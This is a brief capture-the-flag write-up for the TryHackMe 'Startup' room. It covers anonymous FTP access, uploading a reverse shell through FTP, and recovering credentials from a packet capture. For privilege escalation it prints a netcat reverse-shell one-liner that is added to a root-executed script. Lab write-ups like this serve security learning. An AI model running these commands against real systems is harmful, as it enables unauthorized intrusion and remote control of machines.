Startup – TryHackMe

write-up for Tryhackme room Startup

Difficulty level – Easy

Start with Nmap scan

nmap -A -oN initial

Result show Anonymous FTP login possible we log in to FTP, download available files and go through all directories

Now go to web page, its look empty so run gobuster on it

when we go through the “/files” we can notice the same documents which we found in FTP login, so if we can upload a Reverse Shell to using FTP login we can get shell

Upload your prefer reverse shell code, you can find some reverse shell here

Upload reverse shell into “ftp” folder then navigate into location in browser and execute the code.

Success result would be like this

we need to change into stable shell for type this command and get stable shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

when we go thought directories we come across “.pcapng” file which is inside incident folder, download the file to local PC and analysis the packets.

when we analyses the file we notice some password attempts

we have a username and password, so can switch user or try login with SSH, i chose SSH because it give more stable shell.

Privilege Escalation

There is script which is owned by root when execute it will echo which written in “/etc/” this file owed by lennie we can write the file so we can edit and another shell inside it.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Local IP> 9999 >/tmp/f/

after adding this to file, execute or wait some time.

Finally root.

Share this post